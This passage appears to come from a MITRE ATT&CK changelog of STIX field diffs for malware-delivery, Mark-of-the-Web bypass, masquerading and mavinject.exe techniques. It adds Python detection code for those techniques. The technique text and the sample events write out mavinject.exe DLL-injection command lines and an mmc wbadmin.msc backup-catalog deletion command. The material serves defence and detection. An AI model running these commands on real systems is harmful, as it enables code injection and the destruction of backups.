| external_references[5]['description'] | Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021. | Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021. |
| external_references[5]['url'] | https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog |
| external_references[7]['source_name'] | mmc_vulns | what_is_mmc |
| external_references[7]['description'] | Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021. | Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021. |
| external_references[7]['url'] | https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/ | https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console |
| external_references[8]['source_name'] | abusing_com_reg | phobos_virustotal |
| external_references[8]['description'] | bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021. | Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021. |
| external_references[8]['url'] | https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ | https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection |
| x_mitre_version | 1.0 | 2.0 |
| Old Description | New Description |
|---|---|
| An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it. While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). | An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. 
These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['TruKno'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| x_mitre_remote_support | False |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-21 23:10:47.193000+00:00 | 2022-05-20 17:19:50.801000+00:00 |
| description | An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it. While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). | An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. 
These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Password Protected Word Docs', 'description': "Lawrence Abrams. (2017, July 12). PSA: Don't Open SPAM Containing Password Protected Word Docs. Retrieved January 5, 2022.", 'url': 'https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/'} |
| Description |
|---|
| Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB) As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware. Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:05:41.186000+00:00 | 2022-01-14 17:14:27.890000+00:00 |
| external_references[4]['description'] | Federal Bureau of Investigation, Cyber Division. (2020, March 26). FIN7 Cyber Actors Targeting US Businesses Through USB Keystroke Injection Attacks. Retrieved October 14, 2020. | The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022. |
| external_references[4]['url'] | https://www.losangeles.va.gov/documents/MI-000120-MW.pdf | https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/ |
| x_mitre_data_sources[0] | Malware Repository: Malware Metadata | Malware Repository: Malware Content |
| x_mitre_data_sources[1] | Malware Repository: Malware Content | Malware Repository: Malware Metadata |
| Description |
|---|
Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen, which compares files against an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW, but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is an NTFS feature, and many container formats do not support NTFS alternate data streams. After a container file is extracted and/or mounted, the files contained within it may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020) |
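As an added example (not from ATT&CK or the cited sources), a Python parser for the Zone.Identifier stream text and a check that lists which members of a downloaded container came out without the mark; the container stream and member list are constructed, and read_zone_identifier only finds a stream on NTFS.

```python
"""Zone.Identifier (Mark-of-the-Web) parser and a post-extraction check.

Added example; not from ATT&CK or the cited sources. The stream text
([ZoneTransfer] section with ZoneId, ReferrerUrl, HostUrl) follows the
documented NTFS ADS layout; the container stream and member list below
are constructed so the check runs off-line on any platform.
"""
import configparser
from typing import Any, Dict, List, Optional, Tuple

# URLMON security zones carried in ZoneId; 3 and 4 trigger MOTW protections.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

# Constructed: what a browser writes next to a downloaded report.iso ...
CONTAINER_STREAM = (b"[ZoneTransfer]\r\nZoneId=3\r\n"
                    b"ReferrerUrl=https://example.invalid/\r\n"
                    b"HostUrl=https://example.invalid/report.iso\r\n")

# ... and the (name, Zone.Identifier bytes or None) of what came out of it.
# A mounted ISO exposes its members with no ADS at all, which is the gap
# the technique relies on.
MEMBERS: List[Tuple[str, Optional[bytes]]] = [
    ("report.pdf", b"[ZoneTransfer]\r\nZoneId=3\r\n"),  # extractor propagated the mark
    ("report.lnk", None),
    ("helper.dll", None),
]


def parse_zone_identifier(data: bytes) -> Optional[Dict[str, Any]]:
    """Parse the text of a Zone.Identifier stream; None if it is malformed."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(data.decode("utf-8", errors="replace"))
    except configparser.Error:
        return None
    if not cp.has_option("ZoneTransfer", "ZoneId"):
        return None
    sec = cp["ZoneTransfer"]
    try:
        zone = int(sec["ZoneId"])
    except ValueError:
        return None
    return {"zone_id": zone, "zone": ZONE_NAMES.get(zone, "unknown"),
            "referrer": sec.get("ReferrerUrl", ""), "host": sec.get("HostUrl", "")}


def read_zone_identifier(path: str) -> Optional[Dict[str, Any]]:
    """Read a file's MOTW through the NTFS 'file:stream' syntax (Windows only).
    Returns None when the stream is absent or the platform has no ADS."""
    try:
        with open(path + ":Zone.Identifier", "rb") as fh:
            return parse_zone_identifier(fh.read())
    except OSError:
        return None


def untagged_after_extraction(container_motw: Optional[Dict[str, Any]],
                              members: List[Tuple[str, Optional[bytes]]]) -> List[str]:
    """Names of members that lost the mark although the container carried an
    Internet (3) or Restricted (4) zone id: these open without Protected View
    or SmartScreen checks."""
    if container_motw is None or container_motw["zone_id"] < 3:
        return []
    lost = []
    for name, stream in members:
        motw = parse_zone_identifier(stream) if stream else None
        if motw is None or motw["zone_id"] < 3:
            lost.append(name)
    return lost


if __name__ == "__main__":
    motw = parse_zone_identifier(CONTAINER_STREAM)
    print(f"container zone: {motw['zone']} from {motw['host']}")
    print("members without MOTW:", untagged_after_extraction(motw, MEMBERS))
```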
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-13 22:47:08.289000+00:00 | 2022-05-05 04:59:32.535000+00:00 |
| external_references[1]['source_name'] | Microsoft Zone.Identifier 2020 | Beek Use of VHD Dec 2020 |
| external_references[1]['description'] | Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021. | Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8 | https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316 |
| external_references[2]['source_name'] | Beek Use of VHD Dec 2020 | Outflank MotW 2020 |
| external_references[2]['description'] | Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021. | Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s perspective. Retrieved February 22, 2021. |
| external_references[2]['url'] | https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316 | https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/ |
| external_references[3]['source_name'] | Outflank MotW 2020 | Intezer Russian APT Dec 2020 |
| external_references[3]['description'] | Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s perspective. Retrieved February 22, 2021. | Kennedy, J. (2020, December 9). A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021. |
| external_references[3]['url'] | https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/ | https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/ |
| external_references[4]['source_name'] | Intezer Russian APT Dec 2020 | Microsoft Zone.Identifier 2020 |
| external_references[4]['description'] | Kennedy, J. (2020, December 9). A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021. | Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021. |
| external_references[4]['url'] | https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/ | https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8 |
| x_mitre_defense_bypassed[0] | Anti-virus, Application control | Anti-virus |
| x_mitre_detection | Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. | Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.(Citation: Disable automount for ISO) |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Disable automount for ISO', 'description': 'wordmann. (2022, February 8). Disable Disc Imgage. Retrieved February 8, 2022.', 'url': 'https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7'} | |
| x_mitre_defense_bypassed | Application Control |
| Description |
|---|
| Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. | |
| external_references | CAPEC-177 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-177 | |
| external_references | Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 13:24:52.973000+00:00 | 2022-05-05 04:56:08.978000+00:00 |
| external_references[1]['source_name'] | capec | Twitter ItsReallyNick Masquerading Update |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/177.html | https://twitter.com/ItsReallyNick/status/1055321652777619457 |
| external_references[2]['source_name'] | LOLBAS Main Site | Elastic Masquerade Ball |
| external_references[2]['description'] | LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020. | Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016. |
| external_references[2]['url'] | https://lolbas-project.github.io/ | http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf |
| external_references[3]['source_name'] | Elastic Masquerade Ball | LOLBAS Main Site |
| external_references[3]['description'] | Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016. | LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020. |
| external_references[3]['url'] | http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf | https://lolbas-project.github.io/ |
| external_references[4]['source_name'] | Twitter ItsReallyNick Masquerading Update | capec |
| external_references[4]['url'] | https://twitter.com/ItsReallyNick/status/1055321652777619457 | https://capec.mitre.org/data/definitions/177.html |
| x_mitre_defense_bypassed[0] | Application control by file name or path | Application Control |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Service: Service Metadata | |
| x_mitre_data_sources | Image: Image Metadata | |
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Image: Image Metadata | |
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_data_sources | Service: Service Metadata |
| Description |
|---|
| Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous. Adversaries may also use the same icon of the file they are trying to mimic. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. | |
| external_references | CAPEC-177 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-177 | |
| external_references | Docker. (n.d.). Docker Images. Retrieved April 6, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-20 19:23:37.762000+00:00 | 2022-05-05 04:56:50.197000+00:00 |
| external_references[1]['source_name'] | capec | Twitter ItsReallyNick Masquerading Update |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/177.html | https://twitter.com/ItsReallyNick/status/1055321652777619457 |
| external_references[2]['source_name'] | Elastic Masquerade Ball | Docker Images |
| external_references[2]['description'] | Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016. | Docker. (n.d.). Docker Images. Retrieved April 6, 2021. |
| external_references[2]['url'] | http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf | https://docs.docker.com/engine/reference/commandline/images/ |
| external_references[3]['source_name'] | Twitter ItsReallyNick Masquerading Update | Elastic Masquerade Ball |
| external_references[3]['description'] | Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. | Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016. |
| external_references[3]['url'] | https://twitter.com/ItsReallyNick/status/1055321652777619457 | http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf |
| external_references[4]['source_name'] | Docker Images | capec |
| external_references[4]['url'] | https://docs.docker.com/engine/reference/commandline/images/ | https://capec.mitre.org/data/definitions/177.html |
| x_mitre_data_sources[0] | Image: Image Metadata | File: File Metadata |
| x_mitre_data_sources[1] | File: File Metadata | Image: Image Metadata |
| x_mitre_defense_bypassed[0] | Application control by file name or path | Application Control |
| Old Description | New Description |
|---|---|
Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject) Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed) |
Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)
Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.
In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed) |
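As an added example (not from ATT&CK or the cited sources), a small Python detector run over constructed process-creation events for the mmc.exe and mavinject.exe command lines described in the MMC and Mavinject entries above, plus the svchost.exe-outside-System32 case from the Match Legitimate Name or Location entry; the event format, the sample events and the allowlists are constructed.

```python
"""Process-creation checks for the entries above: mmc.exe .msc proxy
execution, mavinject.exe injection switches, and a system binary name
running from the wrong directory.

Added example; not from ATT&CK or the cited sources. The event format
"pid|user|image|cmdline" and the events in SAMPLE_EVENTS are constructed;
map the fields onto Sysmon Event ID 1 or your EDR's process telemetry.
"""
import ntpath
import re
from typing import Dict, List

SAMPLE_EVENTS = [
    # benign: bare snap-in name resolved by mmc from System32
    "4120|CORP\\alice|C:\\Windows\\System32\\mmc.exe|mmc gpedit.msc",
    # COM-embedding invocation of a user-writable .msc (T1218.014)
    "4188|CORP\\alice|C:\\Windows\\System32\\mmc.exe|mmc.exe -Embedding C:\\Users\\alice\\Downloads\\test.msc",
    # backup catalog deletion through the wbadmin snap-in (T1490)
    "4201|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\mmc.exe|mmc wbadmin.msc delete catalog -quiet",
    # mavinject.exe DLL injection and import-descriptor injection (T1218.013)
    "4310|CORP\\bob|C:\\Windows\\System32\\mavinject.exe|C:\\Windows\\system32\\mavinject.exe 1234 /INJECTRUNNING C:\\Users\\bob\\AppData\\Local\\Temp\\x.dll",
    "4322|CORP\\bob|C:\\Windows\\System32\\mavinject.exe|mavinject.exe 1234 /HMODULE=0x7ff6a0000000 C:\\Temp\\y.dll 1",
    # svchost.exe outside System32 (Match Legitimate Name or Location) vs. the real one
    "4401|CORP\\carol|C:\\Users\\carol\\AppData\\Roaming\\svchost.exe|svchost.exe -k netsvcs",
    "4402|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs -p",
]

# Where Windows keeps its own .msc consoles; an .msc with a path outside
# these handed to mmc.exe deserves a look (allowlist is constructed).
TRUSTED_MSC_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Binaries whose names adversaries reuse, with the only directories they
# legitimately run from (constructed, extend for your estate).
EXPECTED_IMAGE_DIRS = {
    "svchost.exe": ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\"),
    "lsass.exe": ("c:\\windows\\system32\\",),
}

_TOKEN = re.compile(r'"[^"]*"|\S+')


def parse_event(line: str) -> Dict[str, str]:
    pid, user, image, cmdline = line.split("|", 3)
    return {"pid": pid, "user": user, "image": image, "cmdline": cmdline}


def tokens(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def check_mmc(ev: Dict[str, str]) -> List[str]:
    if ntpath.basename(ev["image"]).lower() != "mmc.exe":
        return []
    args = [a.lower() for a in tokens(ev["cmdline"])]
    found = []
    # -Embedding is the generic COM local-server activation switch, so only
    # report it together with an .msc outside the trusted directories; a bare
    # name such as gpedit.msc is resolved by mmc itself and is left alone here.
    odd_msc = [a for a in args if a.endswith(".msc") and "\\" in a
               and not a.startswith(TRUSTED_MSC_DIRS)]
    if odd_msc:
        how = "via -Embedding " if "-embedding" in args else ""
        found.append(f"mmc.exe loaded .msc {how}outside trusted dirs: {odd_msc[0]}")
    if "wbadmin.msc" in args and "delete" in args and "catalog" in args:
        found.append("mmc wbadmin.msc delete catalog: backup catalog removal (T1490)")
    return found


def check_mavinject(ev: Dict[str, str]) -> List[str]:
    if ntpath.basename(ev["image"]).lower() != "mavinject.exe":
        return []
    args = [a.lower() for a in tokens(ev["cmdline"])]
    target = next((a for a in args if a.isdigit()), "?")  # first numeric arg is the PID
    found = []
    if "/injectrunning" in args:
        found.append(f"mavinject.exe /INJECTRUNNING into PID {target} (DLL injection)")
    if any(a.startswith("/hmodule") for a in args):
        found.append(f"mavinject.exe /HMODULE against PID {target} (import descriptor injection)")
    return found


def check_image_location(ev: Dict[str, str]) -> List[str]:
    image = ev["image"].lower()
    name = ntpath.basename(image)
    allowed = EXPECTED_IMAGE_DIRS.get(name)
    if allowed and not image.startswith(allowed):
        return [f"{name} running from unexpected path: {ev['image']}"]
    return []


CHECKS = (check_mmc, check_mavinject, check_image_location)


def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Return {pid: [findings]} for every event that triggered a check."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        ev = parse_event(line)
        findings = [f for check in CHECKS for f in check(ev)]
        if findings:
            hits[ev["pid"]] = findings
    return hits


if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_EVENTS).items():
        for f in findings:
            print(f"PID {pid}: {f}")
```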
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 22:11:03.446000+00:00 | 2022-04-19 17:35:08.315000+00:00 |
| description | Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)
Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.
In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed) |
Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)
Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.
